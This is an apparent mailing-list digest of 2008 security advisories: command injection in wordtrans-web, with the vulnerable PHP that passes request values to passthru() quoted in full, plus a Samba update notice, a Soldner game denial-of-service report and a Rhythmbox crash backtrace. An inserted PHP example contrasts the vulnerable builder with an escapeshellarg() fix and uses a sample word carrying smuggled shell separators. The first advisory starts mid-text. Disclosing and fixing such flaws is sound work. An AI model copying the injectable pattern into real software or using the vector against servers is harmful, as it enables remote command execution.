vulnerable script from wordtrans 1.1pre15:

...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";

switch ($_GET['command']) {
...
    default:
        if ($_POST['word'] != "") {
            if ($_POST['fullwords']) $exec_wordtrans .= " +w "; else $exec_wordtrans .= " -w ";
            if ($_POST['casesensitive']) $exec_wordtrans .= " +c "; else $exec_wordtrans .= " -c ";
            if ($_POST['invertir']) $exec_wordtrans .= " +i "; else $exec_wordtrans .= " -i ";
            if ($_POST['noacentos']) $exec_wordtrans .= " +g "; else $exec_wordtrans .= " -g ";

            // $_POST['advanced'] is spliced into the command line unfiltered
            $link_options = "--html-link-options \"?lang=$lang_case&advanced=".$_POST['advanced']."&\" ";
            $exec_wordtrans .= $link_options;

            // $_POST['word'] likewise
            $exec_wordtrans .= "\"".$_POST['word']."\"";

            // the assembled string is handed to the shell
            passthru($exec_wordtrans);
...

To exploit this vulnerability, the "Magic Quotes" option needs to be
unset. But since this option was removed from PHP in version 6.0.0,
this is a critical vulnerability.

IV. Solution

No vendor response.

V. Timeline

March 10th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe
Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment
to stay in the front line of scientific evolution.

Reach us at [EMAIL PROTECTED]
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice.
Use of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality,
correctness, completeness or quality of the information provided by
this document. Under no circumstances shall the authors be held liable
for any direct, indirect, or consequential damages, losses, injuries,
or unlawful offences allegedly arising from the use of this
information.


Copyright 2008 Scanit Middle East FZ/LLC



[USN-617-2] Samba regression

2008-07-01 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-617-2  June 30, 2008
samba regression
CVE-2008-1105, https://bugs.launchpad.net/bugs/241448
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libsmbclient3.0.22-1ubuntu3.8

Ubuntu 7.04:
  libsmbclient3.0.24-2ubuntu1.7

Ubuntu 7.10:
  libsmbclient3.0.26a-1ubuntu2.5

Ubuntu 8.04 LTS:
  libsmbclient3.0.28a-1ubuntu4.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-617-1 fixed vulnerabilities in Samba. The upstream patch
introduced a regression where under certain circumstances accessing
large files might cause the client to report an invalid packet
length error. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Samba developers discovered that nmbd could be made to overrun
 a buffer during the processing of GETDC logon server requests.
 When samba is configured as a Primary or Backup Domain Controller,
 a remote attacker could send malicious logon requests and possibly
 cause a denial of service. (CVE-2007-4572)
 
 Alin Rad Pop of Secunia Research discovered that Samba did not
 properly perform bounds checking when parsing SMB replies. A remote
 attacker could send crafted SMB packets and execute arbitrary code.
 (CVE-2008-1105)


Updated packages for Ubuntu 6.06 LTS:

[SCANIT-2008-002] Wordtrans-web Remote Command Execution Vulnerability

2008-07-01 Thread Scanit Labs
Wordtrans-web Remote Command Execution Vulnerability
Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename:  SCANIT-2008-002.txt
SCANIT ID: SCANIT-2008-002
Published: June 30th, 2008


I. Summary

Wordtrans is a free front-end graphical application that allows you to
look for words in several dictionaries. It can also translate the word
that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute
arbitrary code on the server, caused by an input validation error in
the wordtrans-web package, which is a PHP-based Web interface for
Wordtrans.

II. Affected Products

This vulnerability affects wordtrans 1.1pre15 and probably previous
versions.

III. Details

By sending a GET request with the variable "command" set to 'show_desc',
the variable "link_options" receives one argument from the user, passed
via the "advanced" variable using the GET method. Then, the variable
"link_options" is concatenated with the variable "exec_wordtrans". Since
"exec_wordtrans" is passed to the function "passthru" without checking
for special characters, an attacker can send shell characters like | or
; to execute commands on the machine with the privileges of the Web
server process at the time the URL is submitted. This is part of the
vulnerable script from wordtrans 1.1pre15:

...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";

switch ($_GET['command']) {
    case "show_desc":
        $exec_wordtrans .= "--desc ";
        // $_GET['advanced'] is spliced into the command line unfiltered
        $link_options = "--html-link-options \"?lang=$lang_case&advanced=".$_GET['advanced']."&\" ";
        $exec_wordtrans .= $link_options;

        // the assembled string is handed to the shell
        passthru($exec_wordtrans);
        break;
...

To exploit this vulnerability, the "Magic Quotes" option needs to be
unset. But since this option was removed from PHP in version 6.0.0,
this is a critical vulnerability.

IV. Solution

No vendor response.

V. Timeline

March 1st, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe
Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research
activities. By keeping track of the newest defensive and offensive
technologies, Scanit's researchers are able to contribute with
unpublished works made in-house. This way, by driving the
state-of-the-art in computer security, Scanit honors its commitment
to stay in the front line of scientific evolution.

Reach us at [EMAIL PROTECTED]
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice.
Use of this information constitutes acceptance for use in an "AS IS"
condition. There are no warranties regarding the topicality,
correctness, completeness or quality of the information provided by
this document. Under no circumstances shall the authors be held liable
for any direct, indirect, or consequential damages, losses, injuries,
or unlawful offences allegedly arising from the use of this
information.


Copyright 2008 Scanit Middle East FZ/LLC
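The quoting fix both Scanit wordtrans-web advisories (SCANIT-2008-002 and -003) call for, as an added example that is not wordtrans-web's own code: the advisory's concatenation pattern beside a builder that allow-lists the option values and passes everything else through escapeshellarg(). The function names, the sample binary path and dictionary name, and the validation limits are assumptions.

```php
<?php
declare(strict_types=1);

// Mirrors the vulnerable path from the advisory: request values are spliced
// into a shell command line and the only thing between them and the shell
// is a pair of double quotes.
function build_command_vulnerable(string $wordtrans, string $dict,
                                  string $lang, string $advanced, string $word): string
{
    $exec = $wordtrans . " -d \"$dict\" ";
    $exec .= "--html-link-options \"?lang=$lang&advanced=" . $advanced . "&\" ";
    $exec .= "\"" . $word . "\"";
    return $exec;               // this string would go straight to passthru()
}

// Hardened builder: values that select behaviour are allow-listed, every
// other argument is wrapped by escapeshellarg(), which single-quotes it and
// escapes embedded single quotes, so |, ;, ", ` and $ reach the program as
// data rather than as shell syntax.
function build_command_hardened(string $wordtrans, string $dict,
                                string $lang, string $advanced, string $word): string
{
    if (preg_match('/^[a-z]{2}$/', $lang) !== 1) {
        throw new InvalidArgumentException('lang must be a two-letter code');
    }
    if ($advanced !== '0' && $advanced !== '1') {
        throw new InvalidArgumentException('advanced must be 0 or 1');
    }
    // Reject the empty word (the original only reached passthru() for a
    // non-empty one) and cap the length; 64 is an assumed limit.
    if ($word === '' || strlen($word) > 64) {
        throw new InvalidArgumentException('word missing or too long');
    }
    $linkOptions = "?lang=$lang&advanced=$advanced&";
    return escapeshellarg($wordtrans)
        . ' -d ' . escapeshellarg($dict)
        . ' --html-link-options ' . escapeshellarg($linkOptions)
        . ' ' . escapeshellarg($word);
}

// True when every request-derived value appears in $cmd in its
// escapeshellarg() form, i.e. as one single-quoted token.
function user_input_is_quoted(string $cmd, array $values): bool
{
    foreach ($values as $v) {
        if (strpos($cmd, escapeshellarg($v)) === false) {
            return false;
        }
    }
    return true;
}

// Constructed sample input: a word containing a double quote and the
// separators the advisory says are not filtered.
$word = 'tree"; a | b';
$vuln = build_command_vulnerable('/usr/bin/wordtrans', 'i2e', 'en', '1', $word);
$safe = build_command_hardened('/usr/bin/wordtrans', 'i2e', 'en', '1', $word);

echo $vuln, "\n";   // the embedded " closes the quoted word; ; and | are live
echo $safe, "\n";   // the whole word is one single-quoted argument

var_dump(user_input_is_quoted($vuln, [$word]));   // vulnerable form: not quoted
var_dump(user_input_is_quoted($safe, [$word]));   // hardened form: quoted

// An out-of-range "advanced" value is refused before any command is built.
try {
    build_command_hardened('/usr/bin/wordtrans', 'i2e', 'en', '1; a', 'tree');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

escapeshellarg() removes the dependence on Magic Quotes that the advisory notes; a further step would be to drop the shell entirely and invoke the wordtrans binary with an argument array.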



Endless loop in Soldner 33724

2008-07-01 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  SÖLDNER - Secret Wars
  http://www.secretwars.net
  http://soldner.jowood.com
Versions: <= 33724
Platforms:Windows
Bug:  endless loop
Exploitation: remote, versus server
Date: 01 Jul 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


SÖLDNER is a tactical military game developed by Wings Simulations
and released in May 2004.


###

==
2) Bug
==


Each UDP packet for this game can contain various blocks of data.
The type 0x80 forces the server to perform a cycle from zero to the 32
bit number (so max 0xFFFFFFFF) specified in that data block.
The maximum size of a packet supported by the game is 1400 bytes, in
which it is possible to place at most 233 blocks of this type, causing
the freeze of a server for over 2 hours (tested with a fast CPU).


###

===
3) The Code
===


http://aluigi.org/poc/usurdat.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Re: Rhythmbox Vulnerability

2008-07-01 Thread wargame89
Application: Rhythmbox 0.11.5

OS: Linux - Ubuntu 8.04


Original Advisory: 
http://packetstormsecurity.org/0806-advisories/rhythmbox-dos.txt

The original author of this advisory is Juan Pablo Lopez Yacubian

Author of this advisory: WarGame - http://vx.netlux.org/wargamevx - [EMAIL PROTECTED]


Compiling Rhythmbox 0.11.5 with debug support (-g) and making it parse the DoS
playlist file, you can get this backtrace:


(gdb) run /home/wargame/prova.pls
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/wargame/test/bin/rhythmbox /home/wargame/prova.pls
[Thread debugging using libthread_db enabled]
[New Thread 0x7f01a0a907c0 (LWP 1757)]
[New Thread 0x41691950 (LWP 1760)]

(rhythmbox:1757): Rhythmbox-WARNING **: Unable to grab media player keys: Could not get owner of name 'org.gnome.SettingsDaemon': no such name
[New Thread 0x41e92950 (LWP 1761)]
[Thread 0x41e92950 (LWP 1761) exited]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f01a0a907c0 (LWP 1757)]
0x00dc8820 in ?? ()
(gdb) backtrace
#0  0x00dc8820 in ?? ()
#1  0x7f019a5306f1 in g_hash_table_lookup () from /usr/lib/libglib-2.0.so.0
#2  0x00436487 in playlist_load_ended_cb (parser=0xdc1a00, uri=0xda34d0 "", metadata=0xbe7b90, mgr=0x7fffa8acd250) at rb-playlist-manager.c:576
#3  0x7f019b32dbcf in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#4  0x7f019b3416bc in ?? () from /usr/lib/libgobject-2.0.so.0
#5  0x7f019b3430d5 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#6  0x7f019b343483 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#7  0x7f019ef89611 in ?? () from /usr/lib/libtotem-plparser.so.10
#8  0x7f019ef8970e in ?? () from /usr/lib/libtotem-plparser.so.10
#9  0x7f019ef85b2c in ?? () from /usr/lib/libtotem-plparser.so.10
#10 0x004365e0 in rb_playlist_manager_parse_file (mgr=0xbe7b90, uri=0xdc8c00 "file:///home/wargame/prova.pls", error=0x7fffa8acd818) at rb-playlist-manager.c:621
#11 0x00426375 in rb_shell_load_uri (shell=0x7c81a0, uri=0xdc8c00 "file:///home/wargame/prova.pls", play=1, error=0x7fffa8acd818) at rb-shell.c:3326
#12 0x0041e4cf in local_load_uri (filename=0xdc8c00 "file:///home/wargame/prova.pls", shell=0x7c81a0) at main.c:414
#13 0x0041e32b in load_uri_args (args=0x6b2150, handler=0x41e476 , user_data=0x7c81a0) at main.c:371
#14 0x0041e474 in removable_media_scan_finished (shell=0x7c81a0, data=0x0) at main.c:406
#15 0x7f019b32dbcf in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0x7f019b3416bc in ?? () from /usr/lib/libgobject-2.0.so.0
#17 0x7f019b3430d5 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#18 0x7f019b343483 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#19 0x00421066 in _scan_idle (shell=0x7c81a0) at rb-shell.c:1296
#20 0x7f019a53d262 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#21 0x7f019a540516 in ?? () from /usr/lib/libglib-2.0.so.0
---Type  to continue, or q  to quit---
#22 0x7f019a5407d7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#23 0x7f019d041f03 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#24 0x0041e1bf in main (argc=2, argv=0x7fffa8ace278) at main.c:327
(gdb)


Interesting info at rb-playlist-manager.c:576:

title = g_hash_table_lookup (metadata, TOTEM_PL_PARSER_FIELD_TITLE);


In my opinion the crash happens around this function call.

Have fun!